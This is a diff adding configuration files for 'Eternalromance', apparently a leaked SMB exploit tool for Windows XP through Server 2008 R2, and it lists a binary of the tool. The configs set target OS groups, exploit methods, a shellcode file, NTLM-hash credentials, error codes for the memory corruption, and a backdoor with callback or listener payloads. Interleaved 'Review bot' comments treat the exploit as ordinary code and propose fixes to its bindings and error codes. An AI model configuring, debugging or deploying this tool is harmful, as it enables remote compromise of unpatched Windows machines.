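+</paramgroup>
+<paramgroup name="SERVER_2008_SP1" description="Windows Server 2008 Sp1, 32-bit/64-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>6</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>0</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>1</default>
+</parameter>
+</paramgroup>
+<paramgroup name="SERVER_2008_SP2" description="Windows Server 2008 Sp2, 32-bit/64-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>6</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>0</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>2</default>
+</parameter>
+</paramgroup>
+<paramgroup name="WIN7_SP0" description="Windows 7 Sp0, 32-bit/64-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>6</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>1</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>0</default>
+</parameter>
+</paramgroup>
+<paramgroup name="WIN7_SP1" description="Windows 7 Sp1, 32-bit/64-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>6</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>1</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>1</default>
+</parameter>
+</paramgroup>
+<paramgroup name="SERVER_2008R2_SP0" description="Windows Server 2008 R2 Sp0, 32-bit/64-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>6</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>1</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>0</default>
+</parameter>
+</paramgroup>
+<paramgroup name="SERVER_2008R2_SP1" description="Windows Server 2008 R2 Sp1, 32-bit/64-bit">
+<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
+<default>6</default>
+</parameter>
+<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
+<default>1</default>
+</parameter>
+<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
+<default>1</default>
+</parameter>
+</paramgroup>
+</paramchoice>
+
+<parameter name="TeardownBackdoorAtCompletion" description="Boolean stating whether or not to remove the backdoor following successful callback/callin" type="Boolean" hidden="true">
+<default>0</default>
+</parameter>
+
+<paramchoice name="Payload" description="How the egg will behave">
+<default>Callback</default>
+
+<paramgroup name="Callback" description="The egg will callback to the specified IP and Port">
+<parameter name="CallbackIp" description="Callback IP address the egg will connect to from target" type="IPv4"/>
+<parameter name="CallbackPort" description="Callback port that the egg will connect to from target" type="TcpPort">
+<default>0</default>
+</parameter>
+<parameter name="CallbackLocalPort" description="Callback port that we will listen on to receive the eggs connection" type="TcpPort" required="false"/>
+</paramgroup>
+
+<paramgroup name="Listener" description="The egg will open up a new listening port.">
+<parameter name="ListenPort" description="Port the egg will listen on" type="TcpPort"/>
+<parameter name="CallinPort" description="Port we connect to" type="TcpPort" required="false"/>
+</paramgroup>
+</paramchoice>
+</inputparameters>
+
+<outputparameters>
+<paramchoice name="Contract"
+description="The contract fulfilled by this plugin">
+<value>StagedUpload</value>
+<paramgroup name="StagedUpload" description="">
+<parameter name="ConnectedTcp"
+description="The connected socket"
+type="Socket"/>
+<parameter name="XorMask"
+description="Masking byte"
+type="U8"/>
+</paramgroup>
+</paramchoice>
+<parameter name="TargetOsArchitecture"
+description="The architecture of the target operating system"
+type="String"/>
+</outputparameters>
+
+<errors>
+<errorcode name="ETRO_ERROR_NO_MEMORY" value="65" description="Out of memory"/>
+<errorcode name="ETRO_ERROR_INVALID_PIPE_CHOICE" value="66" description="Named pipe choice not supported"/>
+<errorcode name="ETRO_UNALIGNED_RPC_STRUCT" value="67" description="Unaligned data attempted to be sent over browser pipe"/>
+<errorcode name="ETRO_ERROR_PIPES_NOT_AVAILABLE" value="68" description="No pipes available to connect to"/>
+<errorcode name="ETRO_ERROR_WINSOCK_STARTUP" value="69" description="Winsock failed to start up"/>
+<errorcode name="ETRO_ERROR_PARAM_INIT" value="69" description="Error during parameter initialization"/>
+<errorcode name="ETRO_ERROR_TRANS_NOT_FOUND" value="70" description="Unable to find a Transaction struct with info leak"/>
+<errorcode name="ETRO_ERROR_TRANS_WRITE_OUT_OF_RANGE" value="71" description="Cannot write that far into Transaction, should have written more with WriteAndX"/>
+<errorcode name="ETRO_ERROR_TRANS_TAKEOVER_UNSUCCESSFUL" value="72" description="Memory written to was not a transaction we controlled"/>
+<errorcode name="ETRO_ERROR_OUT_OF_REMOTE_MEMORY" value="73" description="Out of memory to use in remote transaction"/>
+<errorcode name="ETRO_ERROR_UNKNOWN_TRANS_SIZE" value="74" description="Unknown transaction size detected"/>
+<errorcode name="ETRO_ERROR_NOT_ENOUGH_LEAK_DATA" value="75" description="Leak returned with less data than it should have"/>
+<errorcode name="ETRO_ERROR_STRUCT_WALK_ABORTED" value="76" description="Failed to walk structures and find Srv module"/>
+<errorcode name="ETRO_ERROR_BACKDOOR_NOT_PRESENT" value="77" description="Backdoor transaction sent but backdoor did not respond"/>
+<errorcode name="ETRO_ERROR_PAYLOAD_TOO_LARGE" value="78" description="Stage 1 payload exceeded max allowed size (0xFFFF)"/>
+<errorcode name="ETRO_ERROR_BACKDOOR_RETURNED_ERROR" value="79" description="Backdoor present but returned an error code"/>
+<errorcode name="ETRO_ERROR_BLUE_SCREENED_TARGET" value="80" description="Overwrite caused the target to blue screen"/>
+<errorcode name="ETRO_ERROR_OS_NOT_SUPPORTED" value="81" description="Offsets not available for the targeted OS"/>
+<errorcode name="ETRO_ERROR_DISPATCH_TABLE_NOT_FOUND" value="82" description="Unable to locate the dispatch table in memory"/>
+<errorcode name="ETRO_ERROR_EXPLOITATION_UNSUCCESSFUL" value="83" description="Exploit methods were tried and were not successful"/>
+<errorcode name="ETRO_ERROR_EXPLOIT_METHOD_UNSUCCESSFUL" value="84" description="Exploit method was not successful but did not crash, other methods may be tried"/>
+<errorcode name="ETRO_ERROR_INVALID_EXPLOIT_METHOD" value="85" description="Exploit method not possible for target OS"/>
+</errors>
+
+<redirection>
+<local protocol="TCP"
+listenaddr="TargetIp"
+listenport="TargetPort"
+destaddr="TargetIp"
+destport="TargetPort"
+closeoncompletion="true"/>
+<remote protocol="TCP"
+listenaddr="CallbackIp"
+listenport="CallbackPort"
+destport="CallbackLocalPort"/>
+</redirection>
+
+<logic>
+<and>
+<service name="smb">
+<bindtovalue name="Protocol" value="SMB"/>
+<bindtopath name="TargetPort" path="//service[name='smb']/port"/>
+</service>
+<or>
+<os family="windows" name="Windows XP">
+<bindtovalue name="Target" value="XP"/>
+</os>
+<os family="windows" name="Windows 2003" servicepack="0" architecture="x86 32-bit">
+<bindtovalue name="Target" value="W2K3SP0"/>
+</os>
+<os family="windows" name="Windows 2003" servicepack="1" architecture="x86 32-bit">
+<bindtovalue name="Target" value="W2K3SP1"/>
+</os>
+<os family="windows" name="Windows 2003" servicepack="2" architecture="x86 32-bit">
+<bindtovalue name="Target" value="W2K3SP2"/>
+</os>
+<os family="windows" name="Windows XP" servicepack="1" architecture="x64 64-bit">
+<bindtovalue name="Target" value="W2K3XPX64SP1"/>
+</os>
+<os family="windows" name="Windows XP" servicepack="2" architecture="x64 64-bit">
+<bindtovalue name="Target" value="W2K3XPX64SP2"/>
+</os>
+<os family="windows" name="Windows 2003" servicepack="1" architecture="x64 64-bit">
+<bindtovalue name="Target" value="W2K3XPX64SP1"/>
+</os>
+<os family="windows" name="Windows 2003" servicepack="2" architecture="x64 64-bit">
+<bindtovalue name="Target" value="W2K3XPX64SP2"/>
+</os>
+<os family="windows" name="Windows Vista" servicepack="0" architecture="x86 32-bit">
+<bindtovalue name="Target" value="WVISTA_2008_7"/>
+</os>
+<os family="windows" name="Windows Vista" servicepack="1" architecture="x86 32-bit">
+<bindtovalue name="Target" value="WVISTA_2008_7"/>
+</os>
+<os family="windows" name="Windows Vista" servicepack="2" architecture="x86 32-bit">
+<bindtovalue name="Target" value="WVISTA_2008_7"/>
+</os>
+<os family="windows" name="Windows 2008" servicepack="0" architecture="x86 32-bit">
+<bindtovalue name="Target" value="WVISTA_2008_7"/>
+</os>
+<os family="windows" name="Windows 2008" servicepack="1" architecture="x86 32-bit">
+<bindtovalue name="Target" value="WVISTA_2008_7"/>
+</os>
+<os family="windows" name="Windows 2008" servicepack="2" architecture="x86 32-bit">
+<bindtovalue name="Target" value="WVISTA_2008_7"/>
+</os>
+<os family="windows" name="Windows 2008 R2" servicepack="0" architecture="x86 32-bit">
+<bindtovalue name="Target" value="WVISTA_2008_7"/>
+</os>
+<os family="windows" name="Windows 7" servicepack="0" architecture="x86 32-bit">
+<bindtovalue name="Target" value="WVISTA_2008_7"/>
+</os>
+</or>
+</and>
+</logic>
+
+</config>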
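Review bot: Two entries in the errors block share value="69": ETRO_ERROR_WINSOCK_STARTUP and ETRO_ERROR_PARAM_INIT, so a Winsock start-up failure and a parameter-initialization failure report the same status code and cannot be told apart by whoever reads it, while every other code in the table is unique. Give the second one its own number, e.g. `<errorcode name="ETRO_ERROR_PARAM_INIT" value="[UNUSED_CODE]" description="Error during parameter initialization"/>`. Separately, the Target values bound in the logic block ("XP", "W2K3SP0", "W2K3XPX64SP1", "WVISTA_2008_7") do not match any paramgroup name under the Target paramchoice (XP_SP0SP1_X86, SERVER_2003_SP0, XP_SP1_X64, VISTA_SP0 and so on), so unless the framework maps these aliases elsewhere the auto-binding selects no group; the logic also matches only x86 32-bit for Vista/2008/7 although those groups are described as 32-bit/64-bit. Three group descriptions spell "Server" as "Sever" (SERVER_2003_SP0, SERVER_2003_SP1, SERVER_2003_SP2).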
BIN
windows/exploits/Eternalromance-1.3.0.exe
Normal file
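--- a/windows/exploits/Eternalromance-1.3.0.fb
+++ b/windows/exploits/Eternalromance-1.3.0.fb
@@ -0,0 +1,21 @@
+<?xml version="1.0"?>
+<t:config id="7fca44399ae06e52cb50bfdf9ce6bd0f2ed5d28b"
+name="Eternalromance"
+version="1.3.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+<t:touchlist>
+<t:plugin name="Smbtouch"
+displayname="ETRO Vulnerability Touch"
+description="Check if Target is vulnerable to ETRO">
+<t:oparam name="Target" value="Target"/>
+<t:oparam name="TargetOsArchitecture" value="TargetOsArchitecture"/>
+<t:oparam name="PipeName" value="PipeName"/>
+<t:oparam name="ShareName" value="ShareName"/>
+<t:oparam name="Credentials" value="Credentials"/>
+<t:oparam name="Username" value="Username"/>
+<t:oparam name="Password" value="Password"/>
+<t:oparam name="NtlmHash" value="NtlmHash"/>
+</t:plugin>
+</t:touchlist>
+</t:config>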
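Review bot: The Smbtouch plugin exports an oparam named ShareName, but the companion Eternalromance-1.3.0.0.xml in this commit declares no ShareName input parameter (its inputs are NetworkTimeout, TargetIp, TargetPort, MaxExploitAttempts, PipeName and the ExploitMethod/Credentials/Protocol/Target/Payload choices), so that line has nothing to bind to unless the framework silently drops unmatched names; either drop `<t:oparam name="ShareName" value="ShareName"/>` or add the parameter on the config side. The two files are tied together only by the shared id attribute: this .fb carries version="1.3.0" but not the configversion="1.3.0.0" the .xml declares, so a later config revision is not detectable from the touch file alone. Unlike the Esteemaudittouch plugin earlier on this page, which forwards TargetIp, TargetPort and NetworkTimeout as ivparams, this plugin declares none; if Smbtouch reads those from the config implicitly, a comment saying so would save the next reader the comparison.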
426
windows/exploits/Eternalromance-1.4.0.0.xml
Normal file
|
@ -0,0 +1,426 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<config xmlns="urn:trch"
|
||||
id="df1cc1973caa2c3e1bbe4d2e48ffd23e50e4e428"
|
||||
name="Eternalromance"
|
||||
version="1.4.0"
|
||||
configversion="1.4.0.0"
|
||||
schemaversion="2.0.0">
|
||||
<inputparameters>
|
||||
<!-- All plugins that perform blocking network calls must have a NetworkTimeout
|
||||
parameter or its equivalent -->
|
||||
<parameter name="NetworkTimeout"
|
||||
description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
|
||||
type="S16">
|
||||
<default>60</default>
|
||||
</parameter>
|
||||
|
||||
<parameter name="TargetIp"
|
||||
description="Target IP Address"
|
||||
type="IPv4"/>
|
||||
|
||||
<parameter name="TargetPort" description="Target TCP port" type="TcpPort">
|
||||
<default>445</default>
|
||||
</parameter>
|
||||
|
||||
<parameter name="MaxExploitAttempts"
|
||||
description="Number of tries to exploit. Default 3"
|
||||
type="U32"
|
||||
hidden="true">
|
||||
<default>3</default>
|
||||
</parameter>
|
||||
|
||||
<parameter name="PipeName"
|
||||
description="The named pipe to use"
|
||||
type="String">
|
||||
</parameter>
|
||||
|
||||
<paramchoice name="ExploitMethod" description="Which exploit method to use">
|
||||
<default>Default</default>
|
||||
|
||||
<paramgroup name="Default" description="Use the best exploit method(s) for the target OS">
|
||||
<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Fish-in-a-barrel" description="Most reliable exploit method (XP/2k3 only)">
|
||||
<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Matched-pairs" description="Next reliable exploit method (XP/Win7/2k8R2 only)">
|
||||
<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Classic-Romance" description="Original LargePageGroom exploit method (All OS Versions)">
|
||||
<parameter name="ExploitMethodChoice" type="U32" hidden="true" description="">
|
||||
<default>3</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
|
||||
<parameter name="ShellcodeFile"
|
||||
xdevmap="EXPLOIT_SHELLCODE"
|
||||
description="DOPU (ensure correct architecture) ONLY! Other shellcode will likely BSOD."
|
||||
type="LocalFile"/>
|
||||
|
||||
<paramchoice name="Credentials" description="Type of credentials to use">
|
||||
<default>Anonymous</default>
|
||||
|
||||
<paramgroup name="Anonymous" description="Anonymous (NULL session)">
|
||||
<parameter name="CredChoice" type="U32" hidden="true" description="">
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="Username" type="Buffer" hidden="true" description="">
|
||||
<default></default>
|
||||
</parameter>
|
||||
|
||||
<parameter name="Password" type="Buffer" hidden="true" description="">
|
||||
<default></default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Guest" description="Guest account">
|
||||
<parameter name="CredChoice" type="U32" hidden="true" description="">
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="Password" type="Buffer" hidden="true" description="">
|
||||
<default></default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Blank" description="User account with no password set">
|
||||
<parameter name="CredChoice" type="U32" hidden="true" description="">
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="Username" type="Buffer" description="Username entered as hex bytes (in unicode)"/>
|
||||
<parameter name="Password" type="Buffer" hidden="true" description="">
|
||||
<default></default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="Password" description="User name and password">
|
||||
<parameter name="CredChoice" type="U32" hidden="true" description="">
|
||||
<default>3</default>
|
||||
</parameter>
|
||||
<parameter name="Username" type="Buffer" description="Username entered as hex bytes (in unicode)"/>
|
||||
<parameter name="Password" type="Buffer" description="Password entered as hex bytes (in unicode)"/>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="NTLM" description="User name and NTLM hash">
|
||||
<parameter name="CredChoice" type="U32" hidden="true" description="">
|
||||
<default>4</default>
|
||||
</parameter>
|
||||
<parameter name="Username" type="Buffer" description="Username entered as hex bytes (in unicode)"/>
|
||||
<parameter name="NtlmHash" type="Buffer" description="NTLM password hash (in hex)"/>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
|
||||
<paramchoice name="Protocol" description="SMB (default port 445) or NBT (default port 139)">
|
||||
<default>SMB</default>
|
||||
<paramgroup name="SMB" description="">
|
||||
<parameter name="UsingNbt" description="Boolean stating to use Nbt or not" type="Boolean" hidden="true">
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="NBT" description="">
|
||||
<parameter name="UsingNbt" description="Boolean stating to use Nbt or not" type="Boolean" hidden="true">
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
|
||||
<paramchoice name="Target" description="Operating System, Service Pack, of target OS">
|
||||
<paramgroup name="XP_SP0SP1_X86" description="Windows XP Sp0 and Sp1, 32-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="XP_SP2SP3_X86" description="Windows XP Sp2 and Sp3, 32-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="XP_SP1_X64" description="Windows XP Sp1, 64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="XP_SP2_X64" description="Windows XP Sp2, 64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2003_SP0" description="Windows Sever 2003 Sp0, 32-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2003_SP1" description="Windows Sever 2003 Sp1, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2003_SP2" description="Windows Sever 2003 Sp2, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>5</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="VISTA_SP0" description="Windows Vista Sp0, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="VISTA_SP1" description="Windows Vista Sp1, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="VISTA_SP2" description="Windows Vista Sp2, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2008_SP0" description="Windows Server 2008 Sp0, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2008_SP1" description="Windows Server 2008 Sp1, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2008_SP2" description="Windows Server 2008 Sp2, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="WIN7_SP0" description="Windows 7 Sp0, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="WIN7_SP1" description="Windows 7 Sp1, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2008R2_SP0" description="Windows Server 2008 R2 Sp0, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2008R2_SP1" description="Windows Server 2008 R2 Sp1, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</inputparameters>
|
||||
|
||||
<outputparameters>
|
||||
<parameter name="TargetOsArchitecture"
|
||||
description="The architecture of the target operating system"
|
||||
type="String"/>
|
||||
</outputparameters>
|
||||
|
||||
<errors>
|
||||
<errorcode name="ETRO_ERROR_NO_MEMORY" value="65" description="Out of memory"/>
|
||||
<errorcode name="ETRO_ERROR_INVALID_PIPE_CHOICE" value="66" description="Named pipe choice not supported"/>
|
||||
<errorcode name="ETRO_UNALIGNED_RPC_STRUCT" value="67" description="Unaligned data attempted to be sent over browser pipe"/>
|
||||
<errorcode name="ETRO_ERROR_PIPES_NOT_AVAILABLE" value="68" description="No pipes available to connect to"/>
|
||||
<errorcode name="ETRO_ERROR_WINSOCK_STARTUP" value="69" description="Winsock failed to start up"/>
|
||||
<errorcode name="ETRO_ERROR_PARAM_INIT" value="69" description="Error during parameter initialization"/>
|
||||
<errorcode name="ETRO_ERROR_TRANS_NOT_FOUND" value="70" description="Unable to find a Transaction struct with info leak"/>
|
||||
<errorcode name="ETRO_ERROR_TRANS_WRITE_OUT_OF_RANGE" value="71" description="Cannot write that far into Transaction, should have written more with WriteAndX"/>
|
||||
<errorcode name="ETRO_ERROR_TRANS_TAKEOVER_UNSUCCESSFUL" value="72" description="Memory written to was not a transaction we controlled"/>
|
||||
<errorcode name="ETRO_ERROR_OUT_OF_REMOTE_MEMORY" value="73" description="Out of memory to use in remote transaction"/>
|
||||
<errorcode name="ETRO_ERROR_UNKNOWN_TRANS_SIZE" value="74" description="Unknown transaction size detected"/>
|
||||
<errorcode name="ETRO_ERROR_NOT_ENOUGH_LEAK_DATA" value="75" description="Leak returned with less data than it should have"/>
|
||||
<errorcode name="ETRO_ERROR_STRUCT_WALK_ABORTED" value="76" description="Failed to walk structures and find Srv module"/>
|
||||
<errorcode name="ETRO_ERROR_BACKDOOR_NOT_PRESENT" value="77" description="Backdoor transaction sent but backdoor did not respond"/>
|
||||
<errorcode name="ETRO_ERROR_PAYLOAD_TOO_LARGE" value="78" description="Stage 1 payload exceeded max allowed size (0xFFFF)"/>
|
||||
<errorcode name="ETRO_ERROR_BACKDOOR_RETURNED_ERROR" value="79" description="Backdoor present but returned an error code"/>
|
||||
<errorcode name="ETRO_ERROR_BLUE_SCREENED_TARGET" value="80" description="Overwrite caused the target to blue screen"/>
|
||||
<errorcode name="ETRO_ERROR_OS_NOT_SUPPORTED" value="81" description="Offsets not available for the targeted OS"/>
|
||||
<errorcode name="ETRO_ERROR_DISPATCH_TABLE_NOT_FOUND" value="82" description="Unable to locate the dispatch table in memory"/>
|
||||
<errorcode name="ETRO_ERROR_EXPLOITATION_UNSUCCESSFUL" value="83" description="Exploit methods were tried and were not successful"/>
|
||||
<errorcode name="ETRO_ERROR_EXPLOIT_METHOD_UNSUCCESSFUL" value="84" description="Exploit method was not successful but did not crash, other methods may be tried"/>
|
||||
<errorcode name="ETRO_ERROR_INVALID_EXPLOIT_METHOD" value="85" description="Exploit method not possible for target OS"/>
|
||||
</errors>
|
||||
|
||||
<redirection>
|
||||
<local protocol="TCP"
|
||||
listenaddr="TargetIp"
|
||||
listenport="TargetPort"
|
||||
destaddr="TargetIp"
|
||||
destport="TargetPort"
|
||||
closeoncompletion="true"/>
|
||||
</redirection>
|
||||
|
||||
<logic>
|
||||
<and>
|
||||
<service name="smb">
|
||||
<bindtovalue name="Protocol" value="SMB"/>
|
||||
<bindtopath name="TargetPort" path="//service[name='smb']/port"/>
|
||||
</service>
|
||||
<or>
|
||||
<os family="windows" name="Windows XP">
|
||||
<bindtovalue name="Target" value="XP"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2003" servicepack="0" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="W2K3SP0"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2003" servicepack="1" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="W2K3SP1"/>
|
||||
</os>
|
||||
